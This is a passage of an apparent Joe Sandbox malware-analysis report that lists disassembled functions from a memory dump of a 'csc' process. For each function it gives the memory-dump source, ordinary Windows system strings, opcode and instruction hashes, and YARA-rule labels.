                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                                                                  • Instruction ID: 7c379a35171d86556de0f51bb56b6308f58ee9be31ad840319331c2bd18e7a5b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE319077A0021ABBDB11DB94CC48EEEBF79EB84614F044925E515A7260E734DE05DBA0
                                                                                                                                                                                                                                                                                  Function 05C751C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                                                                                                                                                  • Opcode ID: 50a0756da831d90ecfad3920d9c58a144db30e67734acef6cb5919997bfd0171
                                                                                                                                                                                                                                                                                  • Instruction ID: 7bff26e08d17bcc9265fcb653258371893d5b38b4cc7df751464680d1b57036d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50a0756da831d90ecfad3920d9c58a144db30e67734acef6cb5919997bfd0171
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD329CB06083558BC724CF19C584B3EBBE2FF88704F144D5EE99687A90E774DA80DB92
                                                                                                                                                                                                                                                                                  Function 05D3B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 05D3B5C4
                                                                                                                                                                                                                                                                                  • RedirectedKey, xrefs: 05D3B60E
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                                                                                                  • API String ID: 0-1388552009
                                                                                                                                                                                                                                                                                  • Opcode ID: 1a2138306d8091d459cc1b42c5d6b176b51fa51a81ec3f002159fecf1ce476fb
                                                                                                                                                                                                                                                                                  • Instruction ID: 0db04e6ed9f660951ca843b34d47fef455990dbbada5be447465848fa85b48fb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a2138306d8091d459cc1b42c5d6b176b51fa51a81ec3f002159fecf1ce476fb
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7861EEB5D0021DABEB11DFD4C889AEEBFB9FB08714F10406AF905A7200DB749A45DBA0
                                                                                                                                                                                                                                                                                  Function 05C7F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: $$$
                                                                                                                                                                                                                                                                                  • API String ID: 0-233714265
                                                                                                                                                                                                                                                                                  • Opcode ID: a5cf56369e32af1167ce72adcd27641c6bab88f58d22c36c34c5d0ec7824508d
                                                                                                                                                                                                                                                                                  • Instruction ID: 7ef8553c4aece28b8e0f17a68b48eea63de64f51fa5b836d4f5cde113fd66005
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5cf56369e32af1167ce72adcd27641c6bab88f58d22c36c34c5d0ec7824508d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3619E71A0074DCBDB21DFA8C5C9BADBBB2FF44704F10486ED5156BA50CB74AA80EB90
                                                                                                                                                                                                                                                                                  Function 05C60485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • kLsE, xrefs: 05C605FE
                                                                                                                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 05C60586
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                                                                                                                  • Opcode ID: 2bb3619e07e4b45af3ff4323640ab92f80b5bcab2d6aa08d5557a0316658448e
                                                                                                                                                                                                                                                                                  • Instruction ID: ea17b8e207aa23a9dad32b5732eb00bd7a8dcacce1a4735f86d9bfddb9d90ce5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bb3619e07e4b45af3ff4323640ab92f80b5bcab2d6aa08d5557a0316658448e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C519A71A00746DFDB24DFA5C488AEAB7E9BF44300F008C2ED596A3240E7749745CBA5
                                                                                                                                                                                                                                                                                  Function 05C6A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 05C6A21B
                                                                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 05C6A229
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                                                                                                                  • Opcode ID: 474716fa0e0e4592f1ecfa080568e585d866c97bbdd2eb73cee1cdd56532f104
                                                                                                                                                                                                                                                                                  • Instruction ID: ef80cac72a04e880c4fce4d58d8a6b2ed25947f49bb319d72409f8942192bb17
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 474716fa0e0e4592f1ecfa080568e585d866c97bbdd2eb73cee1cdd56532f104
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F641E034744644DBDB15CF59C884B69BBB5FF46700F1448A9E85AEF290E236DB80CB50
                                                                                                                                                                                                                                                                                  Function 05CF314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                                                                                                                  • Opcode ID: d4cae9a8e5212669ac277daf30a3957d85a6948877c67bb68f8e951ed111545c
                                                                                                                                                                                                                                                                                  • Instruction ID: 61347b651d2db9fa09dae83a5993754495acb8001ad33c23dad8a49d2850387a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4cae9a8e5212669ac277daf30a3957d85a6948877c67bb68f8e951ed111545c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA31D031208781ABE315DB68D848B2AB7E4FF85B14F144C69FA558B391EB31DA05C752
                                                                                                                                                                                                                                                                                  Function 05C931BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                                                                                                  • Opcode ID: fa41405f304dadc8c79d3a311fe6a4c4cde210457935ad47a5711f971586ed5e
                                                                                                                                                                                                                                                                                  • Instruction ID: 63f5ba7e73b54c84cfe4cef5e3aeef6d37234f26bb0eadb0d413fa800974e276
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa41405f304dadc8c79d3a311fe6a4c4cde210457935ad47a5711f971586ed5e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 073192726087459FCB25DF28C488A6BFBE8FB85A54F000D2EF99583251D734DE04DB92
                                                                                                                                                                                                                                                                                  Function 05C9A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                                                  • Opcode ID: 53c5aacd71cd585697a1bd1770e7db7b4987d1a2f16164af4e845169fcf02165
                                                                                                                                                                                                                                                                                  • Instruction ID: 9e3e999e614c7f67c5fc604628a8e714eaa351d8420d809812814d41dcc0eaaa
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53c5aacd71cd585697a1bd1770e7db7b4987d1a2f16164af4e845169fcf02165
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1301F4B2254B40AFD315DF18CD4AB127BE8E740B16F008D79F558C75A0E734D904DB46
                                                                                                                                                                                                                                                                                  Function 05C6C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                                                                                                                  • Opcode ID: 62fd31161b6f8b624e2d3889a5410f60543e43bfff9e7b46dcff42a3de7bee3d
                                                                                                                                                                                                                                                                                  • Instruction ID: 98c01fec075d61473a11e51843aa215996228d5fda3a39ffbfb39bafc3b785e3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62fd31161b6f8b624e2d3889a5410f60543e43bfff9e7b46dcff42a3de7bee3d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4824A75E042189FDB24CFA9C8C4BADB7B2FF48310F14896AD85AAB251D7749F81CB50
                                                                                                                                                                                                                                                                                  Function 05C9A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                                                                                                                  • Opcode ID: b70d5c69ae6e3b1883e829666676c758588d322fcc7d11bdd0460394e15ef72f
                                                                                                                                                                                                                                                                                  • Instruction ID: 0b17d98dadc1b7c2f4bd40d811b5a61fa1696297b1bfbc358c76cb3c90602cf8
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b70d5c69ae6e3b1883e829666676c758588d322fcc7d11bdd0460394e15ef72f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB717D75E042099FDF18DF99C580AEDFBB2BF48350F14892EE506E7244E7719A81CB60
                                                                                                                                                                                                                                                                                  Function 05C6965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                                                                                                                  • Instruction ID: a71f56d4bccc1ee119c15f75f2a7bc450647f2e3ed47a2cb583320145d62439b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23619976E00219EBDF21DFA9C884BEEBBF5FF84714F10095AE811A7250D7709A41DBA1
                                                                                                                                                                                                                                                                                  Function 05CEF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                                                                                                  • Instruction ID: 64ceb4576dc0902dfb806fe3fda1956b04f308ff1c6d013c8f1248e234e74984
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A95199B2609746AFE722DF14C884F6BB7E8FB94714F000D2DB54197690E7B4EA05CB91
                                                                                                                                                                                                                                                                                  Function 05C7E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                                                                                                                  • Opcode ID: 7b13787546858e78afd031faa9c65f18cd6641194a8d1f3fb544be13af2b11c8
                                                                                                                                                                                                                                                                                  • Instruction ID: 77cd07110c40dd006cf616ae2776d901183fd16bd4d20dfe58a1237e5012e266
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b13787546858e78afd031faa9c65f18cd6641194a8d1f3fb544be13af2b11c8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC41DE726083099BD720EA75C848F6FB7ECAF88B04F040E6DF585E7580E674DA04D79A
                                                                                                                                                                                                                                                                                  Function 05C941BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                                                                  • Instruction ID: 63dbce5fc17eae888375058c83588bd8784db135290bf26f43350768bc7b126f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351AD72604711AFC324CF19C844A6BBBF8FF48710F00892EFA95976A0E7B4E915CB91
                                                                                                                                                                                                                                                                                  Function 05CE9429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: verifier.dll
                                                                                                                                                                                                                                                                                  • API String ID: 0-3265496382
                                                                                                                                                                                                                                                                                  • Opcode ID: bf96451ff4ee28b355228cd7aa2508e12cfb74caee77461d6f1324ebdbe16b1b
                                                                                                                                                                                                                                                                                  • Instruction ID: 55413b9f41215d8edc7a3336362113ced47fafe916df3994ed7bc936609dd30c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf96451ff4ee28b355228cd7aa2508e12cfb74caee77461d6f1324ebdbe16b1b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF31D6717103029FDB258F5CA851B36B7E5FB89314F94882AE909DF381FA718E81C790
                                                                                                                                                                                                                                                                                  Function 05C97425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                                                                                  • Instruction ID: 747af808493494797a88124ba3bb675bdb3f1b7fa00c89061ffa605bd2df17e6
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D841C1B5A0051ADBCF29DF88C484BBEBBB6FF41705F00485AE941A7201D734DA41CBE1
                                                                                                                                                                                                                                                                                  Function 05C9360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
